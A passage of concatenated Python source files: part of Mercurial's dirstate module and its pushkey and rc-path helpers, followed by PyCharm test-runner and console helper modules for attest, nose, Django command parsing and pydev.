if oldstate in "?r" and "_dirs" in self.__dict__:
self._dirs.addpath(f)
self._dirty = True
self._map[f] = (state, mode, size, mtime)
def normal(self, f):
'''Mark a file normal and clean.'''
s = os.lstat(self._join(f))
mtime = int(s.st_mtime)
self._addpath(f, 'n', s.st_mode,
s.st_size & _rangemask, mtime & _rangemask)
if f in self._copymap:
del self._copymap[f]
if mtime > self._lastnormaltime:
# Remember the most recent modification timeslot for status(),
# to make sure we won't miss future size-preserving file content
# modifications that happen within the same timeslot.
self._lastnormaltime = mtime
def normallookup(self, f):
'''Mark a file normal, but possibly dirty.'''
if self._pl[1] != nullid and f in self._map:
# if there is a merge going on and the file was either
# in state 'm' (-1) or coming from other parent (-2) before
# being removed, restore that state.
entry = self._map[f]
if entry[0] == 'r' and entry[2] in (-1, -2):
source = self._copymap.get(f)
if entry[2] == -1:
self.merge(f)
elif entry[2] == -2:
self.otherparent(f)
if source:
self.copy(source, f)
return
if entry[0] == 'm' or entry[0] == 'n' and entry[2] == -2:
return
self._addpath(f, 'n', 0, -1, -1)
if f in self._copymap:
del self._copymap[f]
def otherparent(self, f):
'''Mark as coming from the other parent, always dirty.'''
if self._pl[1] == nullid:
raise util.Abort(_("setting %r to other parent "
"only allowed in merges") % f)
self._addpath(f, 'n', 0, -2, -1)
if f in self._copymap:
del self._copymap[f]
def add(self, f):
'''Mark a file added.'''
self._addpath(f, 'a', 0, -1, -1)
if f in self._copymap:
del self._copymap[f]
def remove(self, f):
'''Mark a file removed.'''
self._dirty = True
self._droppath(f)
size = 0
if self._pl[1] != nullid and f in self._map:
# backup the previous state
entry = self._map[f]
if entry[0] == 'm': # merge
size = -1
elif entry[0] == 'n' and entry[2] == -2: # other parent
size = -2
self._map[f] = ('r', 0, size, 0)
if size == 0 and f in self._copymap:
del self._copymap[f]
def merge(self, f):
'''Mark a file merged.'''
if self._pl[1] == nullid:
return self.normallookup(f)
s = os.lstat(self._join(f))
self._addpath(f, 'm', s.st_mode,
s.st_size & _rangemask, int(s.st_mtime) & _rangemask)
if f in self._copymap:
del self._copymap[f]
def drop(self, f):
'''Drop a file from the dirstate'''
if f in self._map:
self._dirty = True
self._droppath(f)
del self._map[f]
def _normalize(self, path, isknown, ignoremissing=False, exists=None):
normed = util.normcase(path)
folded = self._foldmap.get(normed, None)
if folded is None:
if isknown:
folded = path
else:
if exists is None:
exists = os.path.lexists(os.path.join(self._root, path))
if not exists:
# Maybe a path component exists
if not ignoremissing and '/' in path:
d, f = path.rsplit('/', 1)
d = self._normalize(d, isknown, ignoremissing, None)
folded = d + "/" + f
else:
# No path components, preserve original case
folded = path
else:
# recursively normalize leading directory components
# against dirstate
if '/' in normed:
d, f = normed.rsplit('/', 1)
d = self._normalize(d, isknown, ignoremissing, True)
r = self._root + "/" + d
folded = d + "/" + util.fspath(f, r)
else:
folded = util.fspath(normed, self._root)
self._foldmap[normed] = folded
return folded
def normalize(self, path, isknown=False, ignoremissing=False):
'''
normalize the case of a pathname when on a casefolding filesystem
isknown specifies whether the filename came from walking the
disk, to avoid extra filesystem access.
If ignoremissing is True, missing path are returned
unchanged. Otherwise, we try harder to normalize possibly
existing path components.
The normalized case is determined based on the following precedence:
- version of name already stored in the dirstate
- version of name stored on disk
- version provided via command arguments
'''
if self._checkcase:
return self._normalize(path, isknown, ignoremissing)
return path
def clear(self):
self._map = {}
if "_dirs" in self.__dict__:
delattr(self, "_dirs")
self._copymap = {}
self._pl = [nullid, nullid]
self._lastnormaltime = 0
self._dirty = True
def rebuild(self, parent, allfiles, changedfiles=None):
changedfiles = changedfiles or allfiles
oldmap = self._map
self.clear()
for f in allfiles:
if f not in changedfiles:
self._map[f] = oldmap[f]
else:
if 'x' in allfiles.flags(f):
self._map[f] = ('n', 0777, -1, 0)
else:
self._map[f] = ('n', 0666, -1, 0)
self._pl = (parent, nullid)
self._dirty = True
def write(self):
if not self._dirty:
return
st = self._opener("dirstate", "w", atomictemp=True)
def finish(s):
st.write(s)
st.close()
self._lastnormaltime = 0
self._dirty = self._dirtypl = False
# use the modification time of the newly created temporary file as the
# filesystem's notion of 'now'
now = util.fstat(st).st_mtime
finish(parsers.pack_dirstate(self._map, self._copymap, self._pl, now))
def _dirignore(self, f):
if f == '.':
return False
if self._ignore(f):
return True
for p in scmutil.finddirs(f):
if self._ignore(p):
return True
return False
def walk(self, match, subrepos, unknown, ignored):
'''
Walk recursively through the directory tree, finding all files
matched by match.
Return a dict mapping filename to stat-like object (either
mercurial.osutil.stat instance or return value of os.stat()).
'''
def fwarn(f, msg):
self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
return False
def badtype(mode):
kind = _('unknown')
if stat.S_ISCHR(mode):
kind = _('character device')
elif stat.S_ISBLK(mode):
kind = _('block device')
elif stat.S_ISFIFO(mode):
kind = _('fifo')
elif stat.S_ISSOCK(mode):
kind = _('socket')
elif stat.S_ISDIR(mode):
kind = _('directory')
return _('unsupported file type (type is %s)') % kind
ignore = self._ignore
dirignore = self._dirignore
if ignored:
ignore = util.never
dirignore = util.never
elif not unknown:
# if unknown and ignored are False, skip step 2
ignore = util.always
dirignore = util.always
matchfn = match.matchfn
matchalways = match.always()
badfn = match.bad
dmap = self._map
normpath = util.normpath
listdir = osutil.listdir
lstat = os.lstat
getkind = stat.S_IFMT
dirkind = stat.S_IFDIR
regkind = stat.S_IFREG
lnkkind = stat.S_IFLNK
join = self._join
work = []
wadd = work.append
exact = skipstep3 = False
if matchfn == match.exact: # match.exact
exact = True
dirignore = util.always # skip step 2
elif match.files() and not match.anypats(): # match.match, no patterns
skipstep3 = True
if not exact and self._checkcase:
normalize = self._normalize
skipstep3 = False
else:
normalize = None
files = sorted(match.files())
subrepos.sort()
i, j = 0, 0
while i < len(files) and j < len(subrepos):
subpath = subrepos[j] + "/"
if files[i] < subpath:
i += 1
continue
while i < len(files) and files[i].startswith(subpath):
del files[i]
j += 1
if not files or '.' in files:
files = ['']
results = dict.fromkeys(subrepos)
results['.hg'] = None
# step 1: find all explicit files
for ff in files:
if normalize:
nf = normalize(normpath(ff), False, True)
else:
nf = normpath(ff)
if nf in results:
continue
try:
st = lstat(join(nf))
kind = getkind(st.st_mode)
if kind == dirkind:
skipstep3 = False
if nf in dmap:
#file deleted on disk but still in dirstate
results[nf] = None
match.dir(nf)
if not dirignore(nf):
wadd(nf)
elif kind == regkind or kind == lnkkind:
results[nf] = st
else:
badfn(ff, badtype(kind))
if nf in dmap:
results[nf] = None
except OSError, inst:
if nf in dmap: # does it exactly match a file?
results[nf] = None
else: # does it match a directory?
prefix = nf + "/"
for fn in dmap:
if fn.startswith(prefix):
match.dir(nf)
skipstep3 = False
break
else:
badfn(ff, inst.strerror)
# step 2: visit subdirectories
while work:
nd = work.pop()
skip = None
if nd == '.':
nd = ''
else:
skip = '.hg'
try:
entries = listdir(join(nd), stat=True, skip=skip)
except OSError, inst:
if inst.errno in (errno.EACCES, errno.ENOENT):
fwarn(nd, inst.strerror)
continue
raise
for f, kind, st in entries:
if normalize:
nf = normalize(nd and (nd + "/" + f) or f, True, True)
else:
nf = nd and (nd + "/" + f) or f
if nf not in results:
if kind == dirkind:
if not ignore(nf):
match.dir(nf)
wadd(nf)
if nf in dmap and (matchalways or matchfn(nf)):
results[nf] = None
elif kind == regkind or kind == lnkkind:
if nf in dmap:
if matchalways or matchfn(nf):
results[nf] = st
elif (matchalways or matchfn(nf)) and not ignore(nf):
results[nf] = st
elif nf in dmap and (matchalways or matchfn(nf)):
results[nf] = None
for s in subrepos:
del results[s]
del results['.hg']
# step 3: report unseen items in the dmap hash
if not skipstep3 and not exact:
if not results and matchalways:
visit = dmap.keys()
else:
visit = [f for f in dmap if f not in results and matchfn(f)]
visit.sort()
if unknown:
# unknown == True means we walked the full directory tree above.
# So if a file is not seen it was either a) not matching matchfn
# b) ignored, c) missing, or d) under a symlink directory.
audit_path = scmutil.pathauditor(self._root)
for nf in iter(visit):
# Report ignored items in the dmap as long as they are not
# under a symlink directory.
if audit_path.check(nf):
try:
results[nf] = lstat(join(nf))
except OSError:
# file doesn't exist
results[nf] = None
else:
# It's either missing or under a symlink directory
results[nf] = None
else:
# We may not have walked the full directory tree above,
# so stat everything we missed.
nf = iter(visit).next
for st in util.statfiles([join(i) for i in visit]):
results[nf()] = st
return results
def status(self, match, subrepos, ignored, clean, unknown):
'''Determine the status of the working copy relative to the
dirstate and return a tuple of lists (unsure, modified, added,
removed, deleted, unknown, ignored, clean), where:
unsure:
files that might have been modified since the dirstate was
written, but need to be read to be sure (size is the same
but mtime differs)
modified:
files that have definitely been modified since the dirstate
was written (different size or mode)
added:
files that have been explicitly added with hg add
removed:
files that have been explicitly removed with hg remove
deleted:
files that have been deleted through other means ("missing")
unknown:
files not in the dirstate that are not ignored
ignored:
files not in the dirstate that are ignored
(by _dirignore())
clean:
files that have definitely not been modified since the
dirstate was written
'''
listignored, listclean, listunknown = ignored, clean, unknown
lookup, modified, added, unknown, ignored = [], [], [], [], []
removed, deleted, clean = [], [], []
dmap = self._map
ladd = lookup.append # aka "unsure"
madd = modified.append
aadd = added.append
uadd = unknown.append
iadd = ignored.append
radd = removed.append
dadd = deleted.append
cadd = clean.append
mexact = match.exact
dirignore = self._dirignore
checkexec = self._checkexec
checklink = self._checklink
copymap = self._copymap
lastnormaltime = self._lastnormaltime
lnkkind = stat.S_IFLNK
for fn, st in self.walk(match, subrepos, listunknown,
listignored).iteritems():
if fn not in dmap:
if (listignored or mexact(fn)) and dirignore(fn):
if listignored:
iadd(fn)
elif listunknown:
uadd(fn)
continue
state, mode, size, time = dmap[fn]
if not st and state in "nma":
dadd(fn)
elif state == 'n':
# The "mode & lnkkind != lnkkind or self._checklink"
# lines are an expansion of "islink => checklink"
# where islink means "is this a link?" and checklink
# means "can we check links?".
mtime = int(st.st_mtime)
if (size >= 0 and
((size != st.st_size and size != st.st_size & _rangemask)
or ((mode ^ st.st_mode) & 0100 and checkexec))
and (mode & lnkkind != lnkkind or checklink)
or size == -2 # other parent
or fn in copymap):
madd(fn)
elif ((time != mtime and time != mtime & _rangemask)
and (mode & lnkkind != lnkkind or checklink)):
ladd(fn)
elif mtime == lastnormaltime:
# fn may have been changed in the same timeslot without
# changing its size. This can happen if we quickly do
# multiple commits in a single transaction.
# Force lookup, so we don't miss such a racy file change.
ladd(fn)
elif listclean:
cadd(fn)
elif state == 'm':
madd(fn)
elif state == 'a':
aadd(fn)
elif state == 'r':
radd(fn)
return (lookup, modified, added, removed, deleted, unknown, ignored,
clean)
```
#### File: bin/mercurial/pushkey.py
```python
import bookmarks, phases, obsolete
def _nslist(repo):
n = {}
for k in _namespaces:
n[k] = ""
if not obsolete._enabled:
n.pop('obsolete')
return n
_namespaces = {"namespaces": (lambda *x: False, _nslist),
"bookmarks": (bookmarks.pushbookmark, bookmarks.listbookmarks),
"phases": (phases.pushphase, phases.listphases),
"obsolete": (obsolete.pushmarker, obsolete.listmarkers),
}
def register(namespace, pushkey, listkeys):
_namespaces[namespace] = (pushkey, listkeys)
def _get(namespace):
return _namespaces.get(namespace, (lambda *x: False, lambda *x: {}))
def push(repo, namespace, key, old, new):
'''should succeed iff value was old'''
pk = _get(namespace)[0]
return pk(repo, key, old, new)
def list(repo, namespace):
'''return a dict'''
lk = _get(namespace)[1]
return lk(repo)
```
#### File: bin/mercurial/scmposix.py
```python
import sys, os
import osutil
def _rcfiles(path):
rcs = [os.path.join(path, 'hgrc')]
rcdir = os.path.join(path, 'hgrc.d')
try:
rcs.extend([os.path.join(rcdir, f)
for f, kind in osutil.listdir(rcdir)
if f.endswith(".rc")])
except OSError:
pass
return rcs
def systemrcpath():
path = []
if sys.platform == 'plan9':
root = 'lib/mercurial'
else:
root = 'etc/mercurial'
# old mod_python does not set sys.argv
if len(getattr(sys, 'argv', [])) > 0:
p = os.path.dirname(os.path.dirname(sys.argv[0]))
path.extend(_rcfiles(os.path.join(p, root)))
path.extend(_rcfiles('/' + root))
return path
def userrcpath():
if sys.platform == 'plan9':
return [os.environ['home'] + '/lib/hgrc']
else:
return [os.path.expanduser('~/.hgrc')]
```
#### File: python/helpers/check_all_test_suite.py
```python
import sys
import re
import os.path
# @formatter:off
COMMUNITY_TEST_ROOT = os.path.expandvars('${DEV_IDEA_HOME}/community/python/testSrc')
ULTIMATE_TEST_ROOT = os.path.expandvars('${DEV_IDEA_HOME}/python/testSrc')
ALL_TEST_SUITE_CLASS = os.path.expandvars('${DEV_IDEA_HOME}/python/testSrc/com/jetbrains/python/PythonAllTestsSuite.java')
# @formatter:on
EXCLUDED_TESTS = {
'FPTest',
'IteratorsTest',
'PyDuplocatorTest',
'PyDjangoRightClickTest', # not in "django" package
'ChameleonTypingTest'
}
EXCLUDED_PACKAGES = {
'env',
'web2py',
'django',
'mako',
'jinja2',
'appengine',
'buildout',
'cython'
}
def check_test_suite(suite_class, *test_roots):
def class_name(path):
return os.path.splitext(os.path.basename(path))[0]
def is_excluded(path):
dir_path, file_name = os.path.split(path)
if any(part in EXCLUDED_PACKAGES for part in dir_path.split(os.path.sep)):
return True
return class_name(file_name) in EXCLUDED_TESTS
def is_abstract_class(path):
with open(path, encoding='utf-8') as f:
return bool(re.search(r'\babstract\b', f.read()))
suite_test_names = set()
with open(suite_class, encoding='utf-8') as f:
for test_name in re.findall(r'(\w+(?:Test|TestCase))\.class', f.read()):
if test_name in suite_test_names:
print('Suite {} contains duplicate item {}'.format(class_name(suite_class),
test_name),
file=sys.stderr)
suite_test_names.add(test_name)
missing_tests = []
for test_root in test_roots:
for dir_path, sub_dirs, files in os.walk(test_root):
for pkg in EXCLUDED_PACKAGES:
if pkg in sub_dirs:
sub_dirs.remove(pkg)
for file_name in files:
test_path = os.path.join(dir_path, file_name)
test_name = class_name(file_name)
if (test_name.endswith(('Test', 'TestCase')) and
not is_excluded(test_path) and
not is_abstract_class(test_path) and
test_name not in suite_test_names):
missing_tests.append(test_name)
return missing_tests
if __name__ == '__main__':
missing = check_test_suite(ALL_TEST_SUITE_CLASS, COMMUNITY_TEST_ROOT, ULTIMATE_TEST_ROOT)
print(',\n'.join(name + '.class' for name in missing))
```
#### File: helpers/pycharm/attestrunner.py
```python
import sys, os
import imp
helpers_dir = os.getenv("PYCHARM_HELPERS_DIR", sys.path[0])
if sys.path[0] != helpers_dir:
sys.path.insert(0, helpers_dir)
from tcunittest import TeamcityTestResult
from pycharm_run_utils import import_system_module
from pycharm_run_utils import adjust_sys_path
from pycharm_run_utils import debug, getModuleName
adjust_sys_path()
re = import_system_module("re")
inspect = import_system_module("inspect")
try:
from attest.reporters import AbstractReporter
from attest.collectors import Tests
from attest import TestBase
except:
raise NameError("Please, install attests")
class TeamCityReporter(AbstractReporter, TeamcityTestResult):
"""Teamcity reporter for attests."""
def __init__(self, prefix):
TeamcityTestResult.__init__(self)
self.prefix = prefix
def begin(self, tests):
"""initialize suite stack and count tests"""
self.total = len(tests)
self.suite_stack = []
self.messages.testCount(self.total)
def success(self, result):
"""called when test finished successfully"""
suite = self.get_suite_name(result.test)
self.start_suite(suite)
name = self.get_test_name(result)
self.start_test(result, name)
self.messages.testFinished(name)
def failure(self, result):
"""called when test failed"""
suite = self.get_suite_name(result.test)
self.start_suite(suite)
name = self.get_test_name(result)
self.start_test(result, name)
exctype, value, tb = result.exc_info
error_value = self.find_error_value(tb)
if (error_value.startswith("'") or error_value.startswith('"')) and\
(error_value.endswith("'") or error_value.endswith('"')):
first = self._unescape(self.find_first(error_value))
second = self._unescape(self.find_second(error_value))
else:
first = second = ""
err = self.formatErr(result.exc_info)
if isinstance(result.error, AssertionError):
self.messages.testFailed(name, message='Failure',
details=err,
expected=first, actual=second)
else:
self.messages.testError(name, message='Error',
details=err)
def finished(self):
"""called when all tests finished"""
self.end_last_suite()
for suite in self.suite_stack[::-1]:
self.messages.testSuiteFinished(suite)
def get_test_name(self, result):
name = result.test_name
ind = name.find("%") #remove unique module prefix
if ind != -1:
name = name[:ind]+name[name.find(".", ind):]
return name
def end_last_suite(self):
if self.current_suite:
self.messages.testSuiteFinished(self.current_suite)
self.current_suite = None
def get_suite_name(self, test):
module = inspect.getmodule(test)
klass = getattr(test, "im_class", None)
file = module.__file__
if file.endswith("pyc"):
file = file[:-1]
suite = module.__name__
if self.prefix:
tmp = file[:-3]
ind = tmp.split(self.prefix)[1]
suite = ind.replace("/", ".")
if klass:
suite += "." + klass.__name__
lineno = inspect.getsourcelines(klass)
else:
lineno = ("", 1)
return (suite, file+":"+str(lineno[1]))
def start_suite(self, suite_info):
"""finish previous suite and put current suite
to stack"""
suite, file = suite_info
if suite != self.current_suite:
if self.current_suite:
if suite.startswith(self.current_suite+"."):
self.suite_stack.append(self.current_suite)
else:
self.messages.testSuiteFinished(self.current_suite)
for s in self.suite_stack:
if not suite.startswith(s+"."):
self.current_suite = s
self.messages.testSuiteFinished(self.current_suite)
else:
break
self.current_suite = suite
self.messages.testSuiteStarted(self.current_suite, location="file://" + file)
def start_test(self, result, name):
"""trying to find test location """
real_func = result.test.func_closure[0].cell_contents
lineno = inspect.getsourcelines(real_func)
file = inspect.getsourcefile(real_func)
self.messages.testStarted(name, "file://"+file+":"+str(lineno[1]))
def get_subclasses(module, base_class=TestBase):
test_classes = []
for name in dir(module):
obj = getattr(module, name)
try:
if issubclass(obj, base_class):
test_classes.append(obj)
except TypeError: # If 'obj' is not a class
pass
return test_classes
def get_module(file_name):
baseName = os.path.splitext(os.path.basename(file_name))[0]
return imp.load_source(baseName, file_name)
modules = {}
def getModuleName(prefix, cnt):
""" adds unique number to prevent name collisions"""
return prefix + "%" + str(cnt)
def loadSource(fileName):
baseName = os.path.basename(fileName)
moduleName = os.path.splitext(baseName)[0]
if moduleName in modules:
cnt = 2
prefix = moduleName
while getModuleName(prefix, cnt) in modules:
cnt += 1
moduleName = getModuleName(prefix, cnt)
debug("/ Loading " + fileName + " as " + moduleName)
module = imp.load_source(moduleName, fileName)
modules[moduleName] = module
return module
def register_tests_from_module(module, tests):
"""add tests from module to main test suite"""
tests_to_register = []
for i in dir(module):
obj = getattr(module, i)
if isinstance(obj, Tests):
tests_to_register.append(i)
for i in tests_to_register:
baseName = module.__name__+"."+i
tests.register(baseName)
test_subclasses = get_subclasses(module)
if test_subclasses:
for subclass in test_subclasses:
tests.register(subclass())
def register_tests_from_folder(tests, folder, pattern=None):
"""add tests from folder to main test suite"""
listing = os.listdir(folder)
files = listing
if pattern: #get files matched given pattern
prog_list = [re.compile(pat.strip()) for pat in pattern.split(',')]
files = []
for fileName in listing:
if os.path.isdir(folder+fileName):
files.append(fileName)
for prog in prog_list:
if prog.match(fileName):
files.append(fileName)
if not folder.endswith("/"):
folder += "/"
for fileName in files:
if os.path.isdir(folder+fileName):
register_tests_from_folder(tests, folder+fileName, pattern)
if not fileName.endswith("py"):
continue
module = loadSource(folder+fileName)
register_tests_from_module(module, tests)
def process_args():
tests = Tests()
prefix = ""
if not sys.argv:
return
arg = sys.argv[1].strip()
if not len(arg):
return
argument_list = arg.split("::")
if len(argument_list) == 1:
# From module or folder
a_splitted = argument_list[0].split(";")
if len(a_splitted) != 1:
# means we have pattern to match against
if a_splitted[0].endswith("/"):
debug("/ from folder " + a_splitted[0] + ". Use pattern: " + a_splitted[1])
prefix = a_splitted[0]
register_tests_from_folder(tests, a_splitted[0], a_splitted[1])
else:
if argument_list[0].endswith("/"):
debug("/ from folder " + argument_list[0])
prefix = a_splitted[0]
register_tests_from_folder(tests, argument_list[0])
else:
debug("/ from file " + argument_list[0])
module = get_module(argument_list[0])
register_tests_from_module(module, tests)
elif len(argument_list) == 2:
# From testcase
debug("/ from test class " + argument_list[1] + " in " + argument_list[0])
module = get_module(argument_list[0])
klass = getattr(module, argument_list[1])
tests.register(klass())
else:
# From method in class or from function
module = get_module(argument_list[0])
if argument_list[1] == "":
debug("/ from function " + argument_list[2] + " in " + argument_list[0])
# test function, not method
test = getattr(module, argument_list[2])
else:
debug("/ from method " + argument_list[2] + " in class " + argument_list[1] + " in " + argument_list[0])
klass = getattr(module, argument_list[1])
test = getattr(klass(), argument_list[2])
tests.register([test])
tests.run(reporter=TeamCityReporter(prefix))
if __name__ == "__main__":
process_args()
```
#### File: django_manage_commands_provider/_parser/_optparse.py
```python
__author__ = 'Ilya.Kazakevich'
from django_manage_commands_provider._parser import _utils
# noinspection PyUnusedLocal
# Parser here by contract
def process_command(dumper, command, parser):
"""
Fetches arguments and options from command and parser and reports em to dumper.
:param dumper dumper to output data to
:param parser opt parser to use
:param command django command
:type dumper _xml.XmlDumper
:type parser optparse.OptionParser
:type command django.core.management.base.BaseCommand
"""
dumper.set_arguments(str(command.args)) # args should be string, but in some buggy cases it is not
# TODO: support subcommands
for opt in command.option_list:
num_of_args = int(opt.nargs) if opt.nargs else 0
opt_type = None
if num_of_args > 0:
opt_type = _utils.get_opt_type(opt)
# There is no official way to access this field, so I use protected one. At least it is public API.
# noinspection PyProtectedMember
dumper.add_command_option(
long_opt_names=opt._long_opts,
short_opt_names=opt._short_opts,
help_text=opt.help,
argument_info=(num_of_args, opt_type) if num_of_args else None)
```
#### File: pycharm/nose_helper/selector.py
```python
import unittest
from nose_helper.config import Config
class Selector(object):
"""Examines test candidates and determines whether,
given the specified configuration, the test candidate should be selected
as a test.
"""
def __init__(self, config):
if config is None:
config = Config()
self.configure(config)
def configure(self, config):
self.config = config
self.match = config.testMatch
def matches(self, name):
return self.match.search(name)
def wantClass(self, cls):
"""Is the class a wanted test class
"""
declared = getattr(cls, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = (not cls.__name__.startswith('_')
and (issubclass(cls, unittest.TestCase)
or self.matches(cls.__name__)))
return wanted
def wantFunction(self, function):
"""Is the function a test function
"""
try:
if hasattr(function, 'compat_func_name'):
funcname = function.compat_func_name
else:
funcname = function.__name__
except AttributeError:
# not a function
return False
import inspect
arguments = inspect.getargspec(function)
if len(arguments[0]) or arguments[1] or arguments[2]:
return False
declared = getattr(function, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = not funcname.startswith('_') and self.matches(funcname)
return wanted
def wantMethod(self, method):
"""Is the method a test method
"""
try:
method_name = method.__name__
except AttributeError:
# not a method
return False
if method_name.startswith('_'):
# never collect 'private' methods
return False
declared = getattr(method, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = self.matches(method_name)
return wanted
def wantModule(self, module):
"""Is the module a test module
we always want __main__.
"""
declared = getattr(module, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = self.matches(module.__name__.split('.')[-1]) \
or module.__name__ == '__main__'
return wanted
defaultSelector = Selector
```
#### File: pycharm/nose_helper/suite.py
```python
from __future__ import generators
import sys
import unittest
from nose_helper.case import Test
from nose_helper.config import Config
from nose_helper.util import isclass, resolve_name, try_run
PYTHON_VERSION_MAJOR = sys.version_info[0]
class LazySuite(unittest.TestSuite):
"""A suite that may use a generator as its list of tests
"""
def __init__(self, tests=()):
self._set_tests(tests)
def __iter__(self):
return iter(self._tests)
def __hash__(self):
return object.__hash__(self)
def addTest(self, test):
self._precache.append(test)
def __nonzero__(self):
if self._precache:
return True
if self.test_generator is None:
return False
try:
test = self.test_generator.next()
if test is not None:
self._precache.append(test)
return True
except StopIteration:
pass
return False
def _get_tests(self):
if self.test_generator is not None:
for i in self.test_generator:
yield i
for test in self._precache:
yield test
def _set_tests(self, tests):
self._precache = []
is_suite = isinstance(tests, unittest.TestSuite)
if hasattr(tests, '__call__') and not is_suite:
self.test_generator = tests()
self.test_generator_counter = list(tests())
elif is_suite:
self.addTests([tests])
self.test_generator = None
self.test_generator_counter = None
else:
self.addTests(tests)
self.test_generator = None
self.test_generator_counter = None
def countTestCases(self):
counter = 0
generator = self.test_generator_counter
if generator is not None:
for test in generator:
counter +=1
for test in self._precache:
counter += test.countTestCases()
return counter
_tests = property(_get_tests, _set_tests, None,
"Access the tests in this suite.")
class ContextSuite(LazySuite):
"""A suite with context.
"""
was_setup = False
was_torndown = False
classSetup = ('setup_class', 'setup_all', 'setupClass', 'setupAll',
'setUpClass', 'setUpAll')
classTeardown = ('teardown_class', 'teardown_all', 'teardownClass',
'teardownAll', 'tearDownClass', 'tearDownAll')
moduleSetup = ('setup_module', 'setupModule', 'setUpModule', 'setup',
'setUp')
moduleTeardown = ('teardown_module', 'teardownModule', 'tearDownModule',
'teardown', 'tearDown')
packageSetup = ('setup_package', 'setupPackage', 'setUpPackage')
packageTeardown = ('teardown_package', 'teardownPackage',
'tearDownPackage')
def __init__(self, tests=(), context=None, factory=None,
config=None):
self.context = context
self.factory = factory
if config is None:
config = Config()
self.config = config
self.has_run = False
self.error_context = None
LazySuite.__init__(self, tests)
def __hash__(self):
return object.__hash__(self)
def __call__(self, *arg, **kw):
return self.run(*arg, **kw)
def _exc_info(self):
return sys.exc_info()
def addTests(self, tests, context=None):
if context:
self.context = context
if PYTHON_VERSION_MAJOR < 3 and isinstance(tests, basestring):
raise TypeError("tests must be an iterable of tests, not a string")
else:
if isinstance(tests, str):
raise TypeError("tests must be an iterable of tests, not a string")
for test in tests:
self.addTest(test)
def run(self, result):
"""Run tests in suite inside of suite fixtures.
"""
result, orig = result, result
try:
self.setUp()
except KeyboardInterrupt:
raise
except:
self.error_context = 'setup'
result.addError(self, self._exc_info())
return
try:
for test in self._tests:
if result.shouldStop:
break
test(orig)
finally:
self.has_run = True
try:
self.tearDown()
except KeyboardInterrupt:
raise
except:
self.error_context = 'teardown'
result.addError(self, self._exc_info())
def setUp(self):
if not self:
return
if self.was_setup:
return
context = self.context
if context is None:
return
factory = self.factory
if factory:
ancestors = factory.context.get(self, [])[:]
while ancestors:
ancestor = ancestors.pop()
if ancestor in factory.was_setup:
continue
self.setupContext(ancestor)
if not context in factory.was_setup:
self.setupContext(context)
else:
self.setupContext(context)
self.was_setup = True
def setupContext(self, context):
if self.factory:
if context in self.factory.was_setup:
return
self.factory.was_setup[context] = self
if isclass(context):
names = self.classSetup
else:
names = self.moduleSetup
if hasattr(context, '__path__'):
names = self.packageSetup + names
try_run(context, names)
def tearDown(self):
if not self.was_setup or self.was_torndown:
return
self.was_torndown = True
context = self.context
if context is None:
return
factory = self.factory
if factory:
ancestors = factory.context.get(self, []) + [context]
for ancestor in ancestors:
if not ancestor in factory.was_setup:
continue
if ancestor in factory.was_torndown:
continue
setup = factory.was_setup[ancestor]
if setup is self:
self.teardownContext(ancestor)
else:
self.teardownContext(context)
def teardownContext(self, context):
if self.factory:
if context in self.factory.was_torndown:
return
self.factory.was_torndown[context] = self
if isclass(context):
names = self.classTeardown
else:
names = self.moduleTeardown
if hasattr(context, '__path__'):
names = self.packageTeardown + names
try_run(context, names)
def _get_wrapped_tests(self):
for test in self._get_tests():
if isinstance(test, Test) or isinstance(test, unittest.TestSuite):
yield test
else:
yield Test(test,
config=self.config)
_tests = property(_get_wrapped_tests, LazySuite._set_tests, None,
"Access the tests in this suite. Tests are returned "
"inside of a context wrapper.")
class ContextSuiteFactory(object):
suiteClass = ContextSuite
def __init__(self, config=None):
if config is None:
config = Config()
self.config = config
self.suites = {}
self.context = {}
self.was_setup = {}
self.was_torndown = {}
def __call__(self, tests, **kw):
"""Return 'ContextSuite' for tests.
"""
context = kw.pop('context', getattr(tests, 'context', None))
if context is None:
tests = self.wrapTests(tests)
context = self.findContext(tests)
return self.makeSuite(tests, context, **kw)
def ancestry(self, context):
"""Return the ancestry of the context
"""
if context is None:
return
if hasattr(context, 'im_class'):
context = context.im_class
if hasattr(context, '__module__'):
ancestors = context.__module__.split('.')
elif hasattr(context, '__name__'):
ancestors = context.__name__.split('.')[:-1]
else:
raise TypeError("%s has no ancestors?" % context)
while ancestors:
yield resolve_name('.'.join(ancestors))
ancestors.pop()
def findContext(self, tests):
if hasattr(tests, '__call__') or isinstance(tests, unittest.TestSuite):
return None
context = None
for test in tests:
# Don't look at suites for contexts, only tests
ctx = getattr(test, 'context', None)
if ctx is None:
continue
if context is None:
context = ctx
return context
def makeSuite(self, tests, context, **kw):
suite = self.suiteClass(
tests, context=context, config=self.config, factory=self, **kw)
if context is not None:
self.suites.setdefault(context, []).append(suite)
self.context.setdefault(suite, []).append(context)
for ancestor in self.ancestry(context):
self.suites.setdefault(ancestor, []).append(suite)
self.context[suite].append(ancestor)
return suite
def wrapTests(self, tests):
if hasattr(tests, '__call__') or isinstance(tests, unittest.TestSuite):
return tests
wrapped = []
for test in tests:
if isinstance(test, Test) or isinstance(test, unittest.TestSuite):
wrapped.append(test)
elif isinstance(test, ContextList):
wrapped.append(self.makeSuite(test, context=test.context))
else:
wrapped.append(
Test(test, config=self.config)
)
return wrapped
class ContextList(object):
"""a group of tests in a context.
"""
def __init__(self, tests, context=None):
self.tests = tests
self.context = context
def __iter__(self):
return iter(self.tests)
```
#### File: pydev/_pydev_bundle/pydev_console_types.py
```python
class CodeFragment:
def __init__(self, text, is_single_line=True):
self.text = text
self.is_single_line = is_single_line
def append(self, code_fragment):
self.text = self.text + "\n" + code_fragment.text
if not code_fragment.is_single_line:
self.is_single_line = False
class Command:
def __init__(self, interpreter, code_fragment):
"""
:type code_fragment: CodeFragment
:type interpreter: InteractiveConsole
"""
self.interpreter = interpreter
self.code_fragment = code_fragment
self.more = None
def symbol_for_fragment(code_fragment):
if code_fragment.is_single_line:
symbol = 'single'
else:
symbol = 'exec' # Jython doesn't support this
return symbol
symbol_for_fragment = staticmethod(symbol_for_fragment)
def run(self):
text = self.code_fragment.text
symbol = self.symbol_for_fragment(self.code_fragment)
self.more = self.interpreter.runsource(text, '<input>', symbol)
```
#### File: pydev/_pydev_bundle/pydev_ipython_console.py
```python
import sys
from _pydev_bundle.pydev_console_utils import BaseInterpreterInterface
from _pydev_bundle.pydev_ipython_console_011 import get_pydev_frontend
